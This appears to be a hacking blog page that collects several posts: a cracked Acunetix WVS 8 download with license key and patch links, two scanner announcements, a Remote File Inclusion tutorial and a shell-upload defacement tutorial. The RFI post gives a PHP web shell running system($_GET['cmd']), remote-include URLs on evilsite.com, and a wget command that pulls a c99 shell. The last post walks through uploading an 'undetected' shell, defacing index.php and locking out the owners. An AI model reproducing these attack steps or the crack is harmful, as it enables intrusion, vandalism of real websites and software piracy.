ACUNETIX WEB VULNERABILITY SCANNER VERSION 8 + PATCH (CRACK) FULL

Worlds best and most popular Vulnerability scanner full version download


Features At a Glance :- 
* Manipulation of inputs from URLs:
Acunetix WVS can automatically identify URL parameters and manipulate them to detect vulnerabilities. This technology is not present in any other competing vulnerability scanner.
Replace manual intervention with scanner intelligence
* Automatic custom 404 error page identification:
Acunetix WVS 8 can automatically determine if a custom error page is in use, and recognizes it without needing any recognition patterns to be configured before the scan.
Interpret IIS 7 rewrite rules automatically
Using the web application’s web.config file, WVS 8 can automatically interpret rewrite rules without requiring any manual input.
Fix vulnerabilities while locking hackers out
* Imperva Web Application Firewall integration:
An exciting co-operation between Imperva and Acunetix; WVS 8 scan results can be imported into an Imperva Web Application Firewall and interpreted automatically as firewall rules.
Use WVS 8 as a true security scanning workhorse
* Multiple instance support:
Acunetix WVS 8 can be relaunched as multiple instances on the same machine, allowing the user to scan multiple websites enabling further support for multi-user scenarios on the same server/workstation.
Re-scan without re-configuring
* Scan settings templates:
WVS 8 can save the settings for the scan of a specific application as a template, making it quick and easy to recall those exact settings for the same application each time it is scanned. This is particularly useful when auditing multiple sites, enabling the user to load the template for each site instead of re-configuring everything manually.
Launch a scan quicker than before
* Simplified Scan Wizard:
In addition to the introduction of Scan Settings Templates and automatic custom 404 error page recognition, the Scan Wizard contains far less options so it’s much easier and quicker to kick off a scan.
Access your results from anywhere and everywhere
* Web-based scheduler:
Accessible via a web interface, the new Scheduler allows administrators to download scan results from any workstation, laptop, or smartphone. The new Scheduler will automatically launch another instance of WVS when multiple web scans are due, preventing multiple processes from depending on the resources of one WVS instance, and thereby allowing scans to complete in less time.
Identify threats unseen by other black-box scanners
* New HTTP Parameter Pollution vulnerability class:
At the time of writing, Acunetix WVS 8 is the only scanner that tests for this security vulnerability.
Ensure complex scans will complete automatically and successfully
* Smart memory management:
The following settings have been added to optimise scanning efficiency:
Define number of files per directory
Limit number of subdirectories per website
Assign Crawler memory limit
Other New Features:-
Real time Crawler status (number of crawled files, inputs discovered, etc.)
Support for custom HTTP headers in automated scans
Configurable log file retention
Detailed Crawler coverage report
Scan status included in report


Steps to get full version of Acunetix web scanner v8 for free
At First got to this link and download acunetix scanner
ID: acunetixwvsfullv8
Password: nFu834!29bg_S2q
Then install it and Open patch and click on patch


Now open Acunetix you will be asked for some details
Enter below details
License Key: 2e3b81463d2s56ae60dwe77fd54f7d60
Name: Hmily/[LCG]
ComPany: Www.52PoJie.Cn
Email: Hmily@Acunetix.com
Telephone: 110


Download PATCH (CRACK)

Mirror

Mirror

Read More

DPScan Drupal Security Scanner

The First Security scanner for Drupal CMS has been released by Ali Elouafiq, on his Blog. His team develop a tool that will enumerate at least the modules used by Drupal so we can simulate a White Box audit on our private machines.


This small tool is public and accessible to you for use however you please. It may help other auditors or penetration testers do their job faster, Here is a little demonstration. After downloading the script (in python), you simply type:
> python DPScan.py [website url]


Download Drupal Security Scanner 

Read More

Acunetix Web Vulnerability Scanner 8 BETA

As the BETA program for Acunetix Web Vulnerability Scanner 8 keeps gaining momentum, all the great feedback received from our BETA participants has helped us achieve the BETA 2 milestone. This brings a significant number of improvements to WVS 8, including new usability features, component enhancements, and a series of bug-fixes.


WVS 8 BETA 2 Change Log
The following updates have been included in the BETA 2 build of WVS 8:


Featured Improvements
Additional .NET AcuSensor support for .NET versions 3, 3.5, 4
Improved blind SQL injection timing tests for PostgreSQL
Improved blind SQL injection timing tests for request-timeout situations
Logs are now flushed to the log-file every 10 seconds when running in console mode
Scheduler feature: notification bar appears if the connection with the server is lost
Bug Fixes
Crash (runtime passive analysis) when “Disable Crawler Aerts” option is enabled
Problem with logging of HTTP_Anomalies when running multiple instances
Problem with writing to temp folder when running multiple instances
Issue with saving application logs to an invalid folder when running the Scheduler
Crash when multiple instances of WVS try to detect custom 404 error-page patterns
Scan does not resume correctly when the Scheduler automatically resumes a scan
Issue with retest functionality for web application scripts
Proxy crash, commonly when the process is already executing
Settings in use by another instance cannot be saved as a Scan Settings Template
Reporter crash when the text in the alert details is too long
Periodical vulnerability reports show incorrect publishing date
Database ID allocation is now synchronized between multiple WVS instances
Scan results cannot be download from the Scheduler since Internet Explorer 7 cache is not used
HTML report format is missing from the Scheduler web interface
Installer assigns full permissions to the license file (non-admin users receive an error when scanning)
Fixed the Scheduler’s Add Scan dialog on Internet Explorer 9
Errors related to a browser-tab do not appear if a different tab is being viewed
Malfunction with some Advanced Penetration testing tools when used through a proxy server
XSS tests are no longer case-sensitive
Scheduler returns invalid error message when connecting to password-protected applications
Scheduler not scanning password-protected applications
Crash with AcuSensor for .NET
False positives are saved for each user instead of globally
Changes to application settings not synchronized across multiple instances
Typos in UI
Reporter RTF-export malfunction
Reporter sets incorrect filename for exported and saved reports
Text wrap working inconsistently across reports

The Acunetix WVS Version 8 user manual is available in PDF Format and also in HTML Format.


Download Acunetix WVS Version 8 BETA

Read More

Remote File Inclusion (RFI) – Tutorial

What is RFI ?

RFI stands for Remote File Inclusion, examples of RFI is the bloated “C99″ script.As good as this script is, its not practical its too big and fills the access logs like a jew. Its highly noticeable.

What is the point in it?

Contrary to popular belief, not all website is hacking is SQL  RFI is great because you can get access too and edit all files on the server it makes defacements and stealing classified material as easy as … wget?

What do I need to be able to do this?

Well basically, a web browser, a simple PHP RFI Script (Will teach you a simple one) and some basic knowledge of BASH (Most servers are linux/unix so you might need this .

Lets go

Okay! So, to start with we need a vulnerable site… How do you find these? Well a g00gle d0rk can help you … Alot. RFI’s work by tricking the server into downloading and executing code thats not actually on it, say a website was

http://shittysite.com/index.php?page=about

This could be a site that pulls in .txt documents to display as pages, very very insecure yet people still do it. Anyway, this either uses the PHP include function we can exploit this… How?

http://shittysite.com/index.php?page=http://evilsite.com/ourscript.txt

Now this could work, it could work quite well. If the site is vulnerable something would happen but I will get into what in a minute.

So, you might of noticed that I added the .txt extension, this might not work as the ?page=about had no .txt extension. This could be because the script automatically appends the .txt file extension (the error you will get is something about it not being able to include ourscript.txt.txt), now as it is appending .txt we can just put ourscript and it will still work, however if it auto-appends something along the lines of .php then we have to use a null byte which is .

Okay, so what do we actually put into ourscript.txt before we do this? Well it could be something like the C99, but unless that script is uploaded instead of included you will get a ton of errors and none of the features will work so instead we have to build our own little script to get this baby working.

Code :

<?php

echo "<script>alert(1337);</script>";
echo "Executing command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);

?>

Something like that will work, as we can send a command to the linux/unix server in bash as well as testing if its RFI vulnerable with the alert box.
Ok, so if it worked we are in luck as we can now send a few commands to the server.
To start with lets try and list all the documents in the current directory. Anyone who knows any bash will know that the list command is ls not dir.

So we do:

http//shittysite.com/index.php?cmd=ls&page=http://evilsite.com/ourscript

That then sends the cmd that we put into our script, and starts to list the documents… This is great! Now we can do anything now, anything at all we can deface the current page using something as simple as

cmd=echo This site got pwn3d by hacker > index.php

That will re-write the index.php and pwn it (Or in the case of a website with .txt extensions you will want to put this into one of the .txt files)
We can download, remove, rename, anything! But that means you need to know some bash. In case you don’t, not all is lost! You can use the ‘wget’ function to download a c99 script.

Ok so how do we do that?

cmd=wget http://evilsite.com/c99.txt

now as a .txt the script is going to be useless, well we could use some LFI but we aren’t going to we are just going to rename it!

mv

Simples..

cmd=mv c99.txt hacked.php

Now by just going to hacked.php the C99 will work and the site can be pwned that way.

This is just a simple tutorial, not too advanced. Its meant to give an overview of RFI, not a complete guide

Read More

How To Upload Shell And Deface – Tutorial

What we need:

1-A Shell (Will be provided)

2-A website vulnerable to SQLi

3-Image or File upload area on that Vulnerable website

So firstly download the shell here.

Download

What is Shell ?

A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )

I am not going to explain SQLi just how to deface.

So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.

Now login to the admin page with the admin details you got.

Go through the admin page until you find a place where you can upload a picture (Usually a picture).

Now you have to upload the shell. Right if you don’t get an error it is all good.

Now to find the shell

Go through the site until you find any image and if you are using firefox Right

- Click on it and “Copy Image Location”

Make a new tab and paste it there.

It will probably look something like this:

http://www.example.com/images/photonamehere.jpg

So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)

Now a page will come up looking like this:

Does probably not look like that but will look similar.

Now you have access to all the files on the site
What you want to do is now,
Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.

Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.

Keep in mind:

• Change Admin Username and Password

•The people have FTP access so you need to change that Password too .

•Always use a Proxy or VPN

Read More